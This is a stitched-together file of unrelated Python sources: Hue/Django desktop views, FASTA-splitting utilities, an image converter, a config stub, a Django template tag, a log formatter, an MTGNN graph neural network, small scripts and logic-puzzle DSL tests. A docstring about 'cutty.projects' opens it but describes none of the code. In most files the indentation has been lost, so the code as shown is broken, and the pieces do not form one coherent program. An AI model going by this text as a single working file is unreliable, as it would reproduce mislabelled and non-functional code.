"""Unit tests for cutty.projects."""
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
import time
import traceback
import zipfile
from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.core.servers.basehttp import FileWrapper
import django.views.debug
from desktop.lib.django_util import login_notrequired, render_json, render
from desktop.lib.paths import get_desktop_root
from desktop.log.access import access_log_level, access_warn
from desktop.models import UserPreferences
from desktop import appmanager
import desktop.conf
import desktop.lib.conf
import desktop.log.log_buffer
LOG = logging.getLogger(__name__)
@access_log_level(logging.WARN)
def log_view(request):
"""
We have a log handler that retains the last X characters of log messages.
If it is attached to the root logger, this view will display that history,
otherwise it will report that it can't be found.
"""
l = logging.getLogger()
for h in l.handlers:
if isinstance(h, desktop.log.log_buffer.FixedBufferHandler):
return render_to_response("logs.html", dict(log=[l for l in h.buf]))
return render_to_response("logs.html", dict(log=["No logs found!"]))
@access_log_level(logging.WARN)
def download_log_view(request):
"""
Zip up the log buffer and then return as a file attachment.
"""
l = logging.getLogger()
for h in l.handlers:
if isinstance(h, desktop.log.log_buffer.FixedBufferHandler):
try:
# We want to avoid doing a '\n'.join of the entire log in memory
# in case it is rather big. So we write it to a file line by line
# and pass that file to zipfile, which might follow a more efficient path.
tmp = tempfile.NamedTemporaryFile()
log_tmp = tempfile.NamedTemporaryFile("w+t")
for l in h.buf:
log_tmp.write(l + '\n')
# This is not just for show - w/out flush, we often get truncated logs
log_tmp.flush()
t = time.time()
zip = zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED)
zip.write(log_tmp.name, "hue-logs/hue-%s.log" % t)
zip.close()
length = tmp.tell()
# if we don't seek to start of file, no bytes will be written
tmp.seek(0)
wrapper = FileWrapper(tmp)
response = HttpResponse(wrapper,content_type="application/zip")
response['Content-Disposition'] = 'attachment; filename=hue-logs-%s.zip' % t
response['Content-Length'] = length
return response
      except Exception:
        logging.exception("Couldn't construct zip file to write logs to!")
        return log_view(request)
return render_to_response("logs.html", dict(log=["No logs found!"]))
@access_log_level(logging.DEBUG)
def prefs(request, key=None):
"""Get or set preferences."""
if key is None:
d = dict( (x.key, x.value) for x in UserPreferences.objects.filter(user=request.user))
return render_json(d)
else:
if "set" in request.REQUEST:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
except UserPreferences.DoesNotExist:
x = UserPreferences(user=request.user, key=key)
x.value = request.REQUEST["set"]
x.save()
return render_json(True)
if "delete" in request.REQUEST:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
x.delete()
return render_json(True)
except UserPreferences.DoesNotExist:
return render_json(False)
else:
try:
x = UserPreferences.objects.get(user=request.user, key=key)
return render_json(x.value)
except UserPreferences.DoesNotExist:
return render_json(None)
def bootstrap(request):
"""Concatenates bootstrap.js files from all installed desktop apps."""
  # Has some Nones for apps that don't have bootstraps.
all_bootstraps = [ (app, app.get_bootstrap_file()) for app in appmanager.DESKTOP_APPS if request.user.has_desktop_permission(action="access", app=app.name) ]
# Iterator over the streams.
concatenated = [ "\n/* %s */\n%s" % (app.name, b.read()) for app, b in all_bootstraps if b is not None ]
  # HttpResponse can take an iterable as the first argument, which
  # is what happens here.
return HttpResponse(concatenated, mimetype='text/javascript')
_status_bar_views = []
def register_status_bar_view(view):
global _status_bar_views
_status_bar_views.append(view)
@access_log_level(logging.DEBUG)
def status_bar(request):
"""
  Concatenates multiple views together to build up a "status bar".
These views are registered using register_status_bar_view above.
"""
resp = ""
for view in _status_bar_views:
try:
r = view(request)
if r.status_code == 200:
resp += r.content
else:
LOG.warning("Failed to execute status_bar view %s" % (view,))
except:
LOG.exception("Failed to execute status_bar view %s" % (view,))
return HttpResponse(resp)
def dump_config(request):
# Note that this requires login (as do most apps).
show_private = False
conf_dir = os.path.realpath(get_desktop_root('conf'))
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
if request.GET.get("private"):
show_private = True
return render("dump_config.mako", request, dict(
show_private=show_private,
top_level=desktop.lib.conf.GLOBAL_CONFIG,
conf_dir=conf_dir,
apps=appmanager.DESKTOP_MODULES))
if sys.version_info[0:2] <= (2,4):
def _threads():
import threadframe
return threadframe.dict().iteritems()
else:
def _threads():
return sys._current_frames().iteritems()
@access_log_level(logging.WARN)
def threads(request):
"""Dumps out server threads. Useful for debugging."""
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
out = []
for thread_id, stack in _threads():
out.append("Thread id: %s" % thread_id)
for filename, lineno, name, line in traceback.extract_stack(stack):
out.append(" %-20s %s(%d)" % (name, filename, lineno))
out.append(" %-80s" % (line))
out.append("")
return HttpResponse("\n".join(out), content_type="text/plain")
@login_notrequired
def index(request):
return render("index.mako", request, dict(
feedback_url=desktop.conf.FEEDBACK_URL.get(),
send_dbug_messages=desktop.conf.SEND_DBUG_MESSAGES.get()
))
def serve_404_error(request, *args, **kwargs):
"""Registered handler for 404. We just return a simple error"""
access_warn(request, "404 not found")
return render_to_response("404.html", dict(uri=request.build_absolute_uri()))
def serve_500_error(request, *args, **kwargs):
"""Registered handler for 500. We use the debug view to make debugging easier."""
if desktop.conf.HTTP_500_DEBUG_MODE.get():
return django.views.debug.technical_500_response(request, *sys.exc_info())
return render_to_response("500.html")
_LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG
}
_MAX_LOG_FRONTEND_EVENT_LENGTH = 1024
_LOG_FRONTEND_LOGGER = logging.getLogger("desktop.views.log_frontend_event")
@login_notrequired
def log_frontend_event(request):
"""
Logs arguments to server's log. Returns an
empty string.
Parameters (specified via either GET or POST) are
"logname", "level" (one of "debug", "info", "warning",
"error", or "critical"), and "message".
"""
def get(param, default=None):
return request.REQUEST.get(param, default)
level = _LOG_LEVELS.get(get("level"), logging.INFO)
msg = "Untrusted log event from user %s: %s" % (
request.user,
get("message", "")[:_MAX_LOG_FRONTEND_EVENT_LENGTH])
_LOG_FRONTEND_LOGGER.log(level, msg)
return HttpResponse("")
def who_am_i(request):
"""
Returns username and FS username, and optionally sleeps.
"""
try:
sleep = float(request.REQUEST.get("sleep") or 0.0)
except ValueError:
sleep = 0.0
time.sleep(sleep)
return HttpResponse(request.user.username + "\t" + request.fs.user + "\n")
# If the app's conf.py has a config_validator() method, call it.
CONFIG_VALIDATOR = 'config_validator'
#
# Cache config errors because (1) they mostly don't go away until restart,
# and (2) they can be costly to compute. So don't stress the system just because
# the dock bar wants to refresh every n seconds.
#
# The actual viewing of all errors may choose to disregard the cache.
#
_CONFIG_ERROR_LIST = None
def _get_config_errors(cache=True):
"""Returns a list of (confvar, err_msg) tuples."""
global _CONFIG_ERROR_LIST
if not cache or _CONFIG_ERROR_LIST is None:
error_list = [ ]
for module in appmanager.DESKTOP_MODULES:
# Get the config_validator() function
try:
validator = getattr(module.conf, CONFIG_VALIDATOR)
except AttributeError:
continue
if not callable(validator):
        LOG.warning("Auto config validation: %s.%s is not a function" %
                    (module.conf.__name__, CONFIG_VALIDATOR))
continue
try:
error_list.extend(validator())
      except Exception as ex:
LOG.exception("Error in config validation by %s: %s" % (module.nice_name, ex))
_CONFIG_ERROR_LIST = error_list
return _CONFIG_ERROR_LIST
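# Illustrative sketch (hypothetical app, not part of Hue): the contract that
# _get_config_errors() expects from an app's conf.py is a module-level
# config_validator() returning a list of (config variable, error message) tuples.
def _example_config_validator():
  """Hypothetical validator demonstrating the (confvar, err_msg) contract."""
  errors = []
  if not desktop.conf.FEEDBACK_URL.get():
    errors.append((desktop.conf.FEEDBACK_URL, "feedback_url is not set."))
  return errors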
def check_config(request):
"""Check config and view for the list of errors"""
if not request.user.is_superuser:
return HttpResponse("You must be a superuser.")
conf_dir = os.path.realpath(get_desktop_root('conf'))
return render('check_config.mako', request, dict(
error_list=_get_config_errors(cache=False),
conf_dir=conf_dir))
def status_bar_config_check(request):
"""Alert administrators about configuration problems."""
if not request.user.is_superuser:
return HttpResponse('')
error_list = _get_config_errors()
if not error_list:
# Return an empty response, rather than using the mako template, for performance.
return HttpResponse('')
return render('config_alert_dock.mako',
request,
dict(error_list=error_list),
force_template=True)
register_status_bar_view(status_bar_config_check)
|
from Bio import SeqIO
import pygustus.util as util
def summarize_acgt_content(inputfile):
util.check_file(inputfile)
letters = ['a', 'c', 'g', 't', 'n']
file_sum = dict.fromkeys(letters, 0)
file_sum.update({'rest': 0})
seq_count = 0
for seq_record in SeqIO.parse(inputfile, 'fasta'):
seq_count += 1
seq_sum = 0
print_seq_acgt = ''
for l in letters:
value = seq_record.seq.lower().count(l)
seq_sum += value
if l != 'n':
print_seq_acgt += f' {value} {l}'
else:
if value > 0:
print_seq_acgt += f' {value} {l}'
update_values(file_sum, l, value)
rest = len(seq_record) - seq_sum
if rest > 0:
print_seq_acgt += f' {rest} ?'
update_values(file_sum, 'rest', rest)
print_seq_line = f'{len(seq_record)} bases.\t{seq_record.id} BASE COUNT {print_seq_acgt}'
print(print_seq_line)
summary_acgt = ''
complete_bp = 0
sum_acgt = 0
    for l in letters:
        if l != 'n':
            summary_acgt += f' {file_sum[l]} {l}'
            complete_bp += file_sum[l]
            sum_acgt += file_sum[l]
    if file_sum['n'] > 0:
        summary_acgt += f" {file_sum['n']} n"
        complete_bp += file_sum['n']
    if file_sum['rest'] > 0:
        summary_acgt += f" {file_sum['rest']} ?"
        complete_bp += file_sum['rest']
gc = 100 * float(file_sum['g'] + file_sum['c']) / sum_acgt
print(f'summary: BASE COUNT {summary_acgt}')
print(f'total {complete_bp}bp in {seq_count} sequence(s).')
print(f'gc: {gc}%')
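# Worked example for the summary above (illustrative record): a 10 bp sequence
# "seq1" with 3 a, 2 c, 2 g, 2 t and 1 n prints
#   10 bases.  seq1 BASE COUNT  3 a 2 c 2 g 2 t 1 n
# and contributes 9 to sum_acgt; the final GC percentage divides (g + c) by
# sum_acgt, so n and other unknown bases are excluded from the denominator.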
def update_values(file_sum, key, value):
cur_value = file_sum[key]
file_sum.update({key: cur_value + value})
def split(inputfile, outputdir, chunksize, overlap, partition_sequences, minsize, max_seq_size):
util.check_file(inputfile)
util.rmtree_if_exists(outputdir, even_none_empty=True)
util.mkdir_if_not_exists(outputdir)
fileidx = 0
run = 0
filesize = 0
records_to_write = list()
records = list(SeqIO.parse(inputfile, 'fasta'))
run_information = list()
for seq_record in records:
seqsize = len(seq_record)
if seqsize > max_seq_size:
if len(records_to_write) > 0:
fileidx += 1
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {x.id: [0, 0] for x in records_to_write}
})
write_file(records_to_write, inputfile, outputdir, fileidx)
filesize = 0
fileidx += 1
write_file([seq_record], inputfile, outputdir, fileidx)
if partition_sequences:
if chunksize == 0:
chunksize = 2500000
if chunksize > 3500000:
chunksize = 3500000
if overlap == 0:
overlap = int(chunksize / 6)
chunks = list()
go_on = True
while go_on:
if len(chunks) == 0:
chunks.append([1, chunksize])
else:
last_start, last_end = chunks[-1]
start = last_end + 1 - overlap
end = start + chunksize - 1
if end >= seqsize:
end = seqsize
go_on = False
chunks.append([start, end])
for c in chunks:
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {seq_record.id: [c[0], c[1]]}
})
else:
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {seq_record.id: [0, 0]}
})
elif minsize == 0 or filesize + seqsize >= minsize or seq_record.id == records[-1].id:
records_to_write.append(seq_record)
fileidx += 1
run += 1
run_information.append(
{
'run': run,
'fileidx': fileidx,
'seqinfo': {x.id: [0, 0] for x in records_to_write}
})
write_file(records_to_write, inputfile, outputdir, fileidx)
filesize = 0
else:
records_to_write.append(seq_record)
filesize += seqsize
return run_information
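# Worked example of the chunking above (illustrative numbers): for a sequence
# longer than max_seq_size, with chunksize=100 and overlap left at 0 (so it
# defaults to 100 // 6 = 16), a 250 bp sequence is covered by the overlapping
# windows [1, 100], [85, 184] and [169, 250]; each window becomes one entry in
# run_information, all pointing at the same split file index.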
def write_file(records_to_write, inputfile, outputdir, fileidx):
splitpath = util.create_split_filenanme(
inputfile, outputdir, fileidx)
SeqIO.write(records_to_write, splitpath, 'fasta')
records_to_write.clear()
def get_sequence_count(inputfile):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return len(sequences)
def get_sequence_size(inputfile, idx=0):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return len(sequences[idx])
def get_sequence_id(inputfile, idx=0):
util.check_file(inputfile)
sequences = list(SeqIO.parse(inputfile, 'fasta'))
return sequences[idx].id
|
import glob
import os
from PIL import Image
# Convert every .pgm image in positive_images/ to a JPEG under newImages/.
os.makedirs('newImages', exist_ok=True)
number = 0
for filename in glob.glob('positive_images/*.pgm'):
    im = Image.open(filename)
    rgb_im = im.convert('RGB')
    rgb_im.save('newImages/pos-' + str(number) + '.jpg')
    number += 1
|
CLIQZDEX_URL = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml"
quiz_url = "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/"
default_max_questions = 10
CONFIG = {
"cliqzdex_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/index.yaml",
"quiz_url": "https://raw.githubusercontent.com/InTEGr8or/cliqzdex/main/quizzes/",
"newline": '\n'
}
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ENDC = '\033[0m'
|
from django import template
register = template.Library()
@register.inclusion_tag('blog/tags/meta.html')
def meta(*objects):
"""Вывод description and title категории"""
try:
object = objects[0][0]
except IndexError:
object = []
return {"object": object}
|
"""Custom log messages."""
import re
RE_BIND_FAILED = re.compile(r".*Bind for.*:(\d*) failed: port is already allocated.*")
def format_message(message: str) -> str:
"""Return a formated message if it's known."""
match = RE_BIND_FAILED.match(message)
if match:
return (
f"Port '{match.group(1)}' is already in use by something else on the host."
)
return message
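if __name__ == "__main__":
    # Quick illustration (hypothetical input string): a Docker "port is already
    # allocated" message is rewritten into a friendlier hint; any other message
    # is returned unchanged.
    print(format_message("Bind for 0.0.0.0:8123 failed: port is already allocated"))
    # -> Port '8123' is already in use by something else on the host.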
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .mtgnn_layers import *
class MTGNN(nn.Module):
r"""An implementation of the Multivariate Time Series Forecasting Graph Neural Networks.
For details see this paper: `"Connecting the Dots: Multivariate Time Series Forecasting with Graph Neural Networks." <https://arxiv.org/pdf/2005.11650.pdf>`_
Args:
gcn_true (bool) : whether to add graph convolution layer.
buildA_true (bool) : whether to construct adaptive adjacency matrix.
gcn_depth (int) : graph convolution depth.
num_nodes (int) : number of nodes in the graph.
        dropout (float, optional) : dropout rate, default 0.3.
static_feat (Pytorch Float Tensor, optional) : static feature, default None.
predefined_A (Pytorch Float Tensor, optional) : predefined adjacency matrix, default None.
subgraph_size (int, optional) : size of subgraph, default 20.
node_dim (int, optional) : dimension of nodes, default 40.
dilation_exponential (int, optional) : dilation exponential, default 1.
conv_channels (int, optional) : convolution channels, default 32.
residual_channels (int, optional) : residual channels, default 32.
skip_channels (int, optional) : skip channels, default 64.
end_channels (int, optional): end channels, default 128.
seq_length (int, optional) : length of input sequence, default 12.
in_dim (int, optional) : input dimension, default 2.
out_dim (int, optional) : output dimension, default 12.
layers (int, optional) : number of layers, default 3.
        propalpha (float, optional) : prop alpha, ratio of retaining the root nodes' original states in mix-hop propagation, a value between 0 and 1, default 0.05.
tanhalpha (float, optional) : tanh alpha for generating adjacency matrix, alpha controls the saturation rate, default 3.
layer_norm_affline (bool, optional) : whether to do elementwise affine in Layer Normalization, default True.
"""
def __init__(self, gcn_true, buildA_true, gcn_depth, num_nodes, predefined_A=None, static_feat=None, dropout=0.3, subgraph_size=20, node_dim=40, dilation_exponential=1, conv_channels=32, residual_channels=32, skip_channels=64, end_channels=128, seq_length=12, in_dim=2, out_dim=12, layers=3, propalpha=0.05, tanhalpha=3, layer_norm_affline=True):
super(MTGNN, self).__init__()
self.gcn_true = gcn_true
self.buildA_true = buildA_true
self.num_nodes = num_nodes
self.dropout = dropout
self.predefined_A = predefined_A
self.filter_convs = nn.ModuleList()
self.gate_convs = nn.ModuleList()
self.residual_convs = nn.ModuleList()
self.skip_convs = nn.ModuleList()
self.gconv1 = nn.ModuleList()
self.gconv2 = nn.ModuleList()
self.norm = nn.ModuleList()
self.start_conv = nn.Conv2d(in_channels=in_dim,
out_channels=residual_channels,
kernel_size=(1, 1))
self.gc = graph_constructor(num_nodes, subgraph_size, node_dim, alpha=tanhalpha, static_feat=static_feat)
self.seq_length = seq_length
kernel_size = 7
if dilation_exponential>1:
self.receptive_field = int(1+(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1))
else:
self.receptive_field = layers*(kernel_size-1) + 1
for i in range(1):
if dilation_exponential>1:
rf_size_i = int(1 + i*(kernel_size-1)*(dilation_exponential**layers-1)/(dilation_exponential-1))
else:
rf_size_i = i*layers*(kernel_size-1)+1
new_dilation = 1
for j in range(1,layers+1):
if dilation_exponential > 1:
rf_size_j = int(rf_size_i + (kernel_size-1)*(dilation_exponential**j-1)/(dilation_exponential-1))
else:
rf_size_j = rf_size_i+j*(kernel_size-1)
self.filter_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation))
self.gate_convs.append(dilated_inception(residual_channels, conv_channels, dilation_factor=new_dilation))
self.residual_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=residual_channels,
kernel_size=(1, 1)))
if self.seq_length>self.receptive_field:
self.skip_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=skip_channels,
kernel_size=(1, self.seq_length-rf_size_j+1)))
else:
self.skip_convs.append(nn.Conv2d(in_channels=conv_channels,
out_channels=skip_channels,
kernel_size=(1, self.receptive_field-rf_size_j+1)))
if self.gcn_true:
self.gconv1.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha))
self.gconv2.append(mixprop(conv_channels, residual_channels, gcn_depth, dropout, propalpha))
if self.seq_length>self.receptive_field:
self.norm.append(LayerNorm((residual_channels, num_nodes, self.seq_length - rf_size_j + 1),elementwise_affine=layer_norm_affline))
else:
self.norm.append(LayerNorm((residual_channels, num_nodes, self.receptive_field - rf_size_j + 1),elementwise_affine=layer_norm_affline))
new_dilation *= dilation_exponential
self.layers = layers
self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,
out_channels=end_channels,
kernel_size=(1,1),
bias=True)
self.end_conv_2 = nn.Conv2d(in_channels=end_channels,
out_channels=out_dim,
kernel_size=(1,1),
bias=True)
if self.seq_length > self.receptive_field:
self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.seq_length), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, self.seq_length-self.receptive_field+1), bias=True)
else:
self.skip0 = nn.Conv2d(in_channels=in_dim, out_channels=skip_channels, kernel_size=(1, self.receptive_field), bias=True)
self.skipE = nn.Conv2d(in_channels=residual_channels, out_channels=skip_channels, kernel_size=(1, 1), bias=True)
self.idx = torch.arange(self.num_nodes)
def forward(self, input, idx=None):
"""
Making a forward pass of MTGNN.
Arg types:
* input (PyTorch Float Tensor) - input sequence, with shape (batch size, input dimension, number of nodes, input sequence length).
* idx (Tensor, optional): input indices, a permutation of the number of nodes, default None (no permutation).
Return types:
* x (PyTorch Float Tensor) - output sequence for prediction, with shape (batch size, input sequence length, number of nodes, 1).
"""
seq_len = input.size(3)
assert seq_len==self.seq_length, 'input sequence length not equal to preset sequence length'
if self.seq_length<self.receptive_field:
input = nn.functional.pad(input,(self.receptive_field-self.seq_length,0,0,0))
if self.gcn_true:
if self.buildA_true:
if idx is None:
adp = self.gc(self.idx.to(input.device))
else:
adp = self.gc(idx)
else:
adp = self.predefined_A
x = self.start_conv(input)
skip = self.skip0(F.dropout(input, self.dropout, training=self.training))
for i in range(self.layers):
residual = x
filter = self.filter_convs[i](x)
filter = torch.tanh(filter)
gate = self.gate_convs[i](x)
gate = torch.sigmoid(gate)
x = filter * gate
x = F.dropout(x, self.dropout, training=self.training)
s = x
s = self.skip_convs[i](s)
skip = s + skip
if self.gcn_true:
x = self.gconv1[i](x, adp)+self.gconv2[i](x, adp.transpose(1,0))
else:
x = self.residual_convs[i](x)
x = x + residual[:, :, :, -x.size(3):]
if idx is None:
x = self.norm[i](x,self.idx)
else:
x = self.norm[i](x,idx)
skip = self.skipE(x) + skip
x = F.relu(skip)
x = F.relu(self.end_conv_1(x))
x = self.end_conv_2(x)
return x
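if __name__ == '__main__':
    # Minimal usage sketch (illustrative, not part of the library): build an MTGNN
    # over 10 nodes and run a forward pass on random input shaped
    # (batch, in_dim, num_nodes, seq_length) as described in the docstrings above.
    # subgraph_size is kept <= num_nodes so the learned-graph top-k step is valid.
    _model = MTGNN(gcn_true=True, buildA_true=True, gcn_depth=2, num_nodes=10,
                   subgraph_size=5, seq_length=12, in_dim=2, out_dim=12)
    _x = torch.rand(8, 2, 10, 12)
    print(_model(_x).shape)  # expected: torch.Size([8, 12, 10, 1])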
|
import logging
import sys
from metanime import Anime, Renderer
def render(season):
animes = Anime.load(f'seasons/{season}.yml')
renderer = Renderer('views', 'docs')
for anime in animes:
renderer.render_anime(anime)
renderer.render_season(season, animes)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
render(sys.argv[1])
|
#!/usr/bin/env python
from yaml import load, dump
from collections import OrderedDict
import time, os, errno
from visualize import visualize
DIV = '\n'+ '='*64 + '\n'
start_time = time.time()
def usage():
pass
# Iterate over all conversation threads
def summarize():
print 'Opening file... ',
file = open('messages_jacob.yaml', 'r')
print 'successful!'
print 'Parsing file... ',
messages = load(file)
print 'successful!' + DIV
x = 1
for thread in messages:
message_contribution = {'Jacob Ziontz': 0}
# Iterate over all messages in a thread
for message in thread['messages']:
try:
message_contribution[message['sender']] += 1
except KeyError:
message_contribution[message['sender']] = 1
# Print outputs
print 'Thread', x
print len(message_contribution), 'participants, ',
print len(thread['messages'] ), 'messages'
for participant, count in message_contribution.iteritems():
print '\t', participant.encode('utf-8').strip(), ' - ', count
print '\n'
x += 1
    print 'Total number of conversations:', x - 1
def conversation_separator():
print 'Opening file... ',
file = open('messages_jacob.yaml', 'r')
print 'successful!'
print 'Parsing file... ',
messages = load(file)
print 'successful!' + DIV
count = 1
for thread in messages:
filename = 'conversations_jacob/%d.yaml' % count
        if not os.path.exists('conversations_jacob'):
            print 'Creating directory conversations_jacob'
            try:
                os.makedirs('conversations_jacob')
            except OSError as exc:  # Guard against race condition
                if exc.errno != errno.EEXIST:
                    raise
print 'Writing', filename
conversation_file = open(filename, 'w')
dump(thread, conversation_file)
count += 1
print '(%s seconds)' % round((time.time() - start_time), 2)
# Generates insight data on a single conversation thread
def insight():
print 'Opening thread... ',
file = open('conversations_test/440.yaml', 'r')
print 'successful!'
print 'Loading thread... ',
thread = load(file)
print 'successful!' + DIV
# 1. Pie chart showing contribution of messages by each person
message_contribution = {'Alvin Cao': 0}
for message in thread['messages']:
try:
message_contribution[message['sender']] += 1
except KeyError:
message_contribution[message['sender']] = 1
print message_contribution
# 2. Line chart showing messages per month
messages_over_time = {}
for message in thread['messages']:
try:
messages_over_time[message['date'].partition('T')[0][:7]] += 1
except KeyError:
messages_over_time[message['date'].partition('T')[0][:7]] = 1
    # Sort by month so the line chart is chronological.
    messages_over_time = OrderedDict(sorted(messages_over_time.items(), key=lambda t: t[0]))
def break_message(message):
if message == '': return '(sticker/emoji)'
if len(message) <= 56: return message
accumulate = 0
broken_message = ''
for word in message.split(' '):
if len(word) >= 56:
return word[:56] + '<br>' + word[56:]
accumulate += len(word) + 1
print accumulate
broken_message += word + ' '
if accumulate >= 56:
broken_message += '<br>'
accumulate = 0
return broken_message
# 3. Get first message
for message in thread['messages']:
first_message = message['sender'] + ', '
first_message += message['date'].partition('T')[0][:10]
first_message += '<br>' + break_message(message['message'])
break
print first_message
visualize(message_contribution, messages_over_time, first_message)
# Execute one at a time in order
#summarize()
#conversation_separator()
insight()
|
import collections
from data.logic.dsl import *
from spec.mamba import *
with description('dsl'):
with before.each:
self.dimensions = DimensionFactory()
self.model = Model(self.dimensions)
with it('defines dimensions'):
(Andy, Bob, Cathy) = name = self.dimensions(name=['Andy', 'Bob', 'Cathy'])
(CEO, Project_Manager, Analyst) = occupation = self.dimensions(
occupation=['CEO', 'Project Manager', 'analyst'])
(_10, _11, _12) = age = self.dimensions(age=[10, 11, 12])
expect(self.dimensions.dimensions()).to(have_len(3))
with description('with setup'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self.CEO, self.Project_Manager, self.Analyst) = self.occupation = (
self.dimensions(occupation=['CEO', 'Project Manager', 'analyst']))
(self._10, self._11, self._12) = self.age = self.dimensions(
age=[10, 11, 12])
with it('accumulates constraints'):
self.model(self.Andy == self.Analyst)
expect(self.model.constraints).to(have_len(1))
with it('supports diverse constraints'):
self.model(self.Andy.occupation == self.Analyst)
self.model((11 == self.Bob.age) ^ (11 == self.Analyst.age))
self.model(self.CEO.age + 2 == self.Andy.age)
expect(str(self.model)).to(look_like("""
assign:
name["Andy"].occupation["analyst"] in {0,1}
name["Bob"].age in {10..12}
occupation["analyst"].age in {10..12}
name["Andy"].age in {10..12}
occupation["CEO"].age in {10..12}
subject to:
(name["Andy"].occupation["analyst"] == True)
(((name["Bob"].age == 11) + (occupation["analyst"].age == 11)) == 1)
(name["Andy"].age == (occupation["CEO"].age + 2))
"""))
with description('2D solutions'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self._10, self._11, self._12) = self.age = self.dimensions(
age=[10, 11, 12])
with it('volunteers a valid solution without any context'):
name_counter = collections.Counter()
age_counter = collections.Counter()
solver = self.model.load('Mistral')
solver.solve()
expect(str(solver)).to(look_like("""
name | age
Andy | 10
Bob | 11
Cathy | 12
"""))
with it('finds correct solution with constraints'):
# Force Bob == 12.
self.model(~self.Andy[12])
self.model(~self.Cathy[12])
# Force Cathy == 10
self.model(~self.name['Cathy'][11])
expect(str(self.model)).to(look_like("""
assign:
name["Andy"].age in {10..12}
name["Cathy"].age in {10..12}
subject to:
((1 - (name["Andy"].age == 12)) == True)
((1 - (name["Cathy"].age == 12)) == True)
((1 - (name["Cathy"].age == 11)) == True)
"""))
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('finds solutions with reified dimension inequalities'):
# Force Andy between Cathy and Bob.
self.model(self.name['Andy']['age'] > self.name['Cathy']['age'])
self.model(self.name['Andy']['age'] < self.name['Bob']['age'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('finds solutions with reified dimension offsets'):
# Cathy = Bob - 2.
self.model(self.name['Cathy']['age'] == self.name['Bob']['age'] - 2)
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 11
Bob | 12
Cathy | 10
"""))
with it('support for abs()'):
self.model(abs(self.name['Andy']['age'] - self.name['Cathy']['age']) == 2)
self.model(self.name['Cathy']['age'] > self.name['Andy']['age'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | age
Andy | 10
Bob | 11
Cathy | 12
"""))
expect(solver.solve()).to(be_false)
with description('3D solutions'):
with before.each:
(self.Andy, self.Bob, self.Cathy) = self.name = self.dimensions(
name=['Andy', 'Bob', 'Cathy'])
(self.CEO, self.Project_Manager, self.Analyst) = self.occupation = (
self.dimensions(occupation=['CEO', 'Project Manager', 'Analyst']))
(self._10, self._11, self._11) = self.age = self.dimensions(
age=[10, 11, 11])
with it('volunteers a valid solution without any context'):
seen = collections.Counter()
solver = self.model.load('Mistral')
solver.solve()
for variable_name, value in self.model._variable_cache.items():
x, y = variable_name.split('.')
if value.get_value():
seen[x] += 1
seen[y] += 1
# Each value is part of 2 tables except for 11 which appears 2x.
expect(seen).to(equal({
'name["Andy"]': 2, 'name["Bob"]': 2, 'name["Cathy"]': 2,
'occupation["CEO"]': 2, 'occupation["Project Manager"]': 2,
'occupation["Analyst"]': 2,
'age[10]': 2, 'age[11]': 4,
}))
with it('produces a correct solution with constraints'):
# CEO is not the youngest.
self.model(self.CEO['age'] >= self.Project_Manager['age'])
self.model(self.CEO['age'] >= self.Analyst['age'])
# Andy is a year younger than Bob.
self.model(self.Andy['age'] + 1 == self.Bob['age'])
# Cathy is older than the Project_Manager.
self.model(self.Cathy['age'] > self.Project_Manager['age'])
# Bob is either the CEO or the Project Manager.
self.model(self.Bob['Analyst'] | self.Bob['Project Manager'])
solver = self.model.load('Mistral')
expect(solver.solve()).to(be_true)
expect(str(solver)).to(look_like("""
name | occupation | age
Andy | Project Manager | 10
Bob | Analyst | 11
Cathy | CEO | 11
"""))
# Verify there are no other solutions.
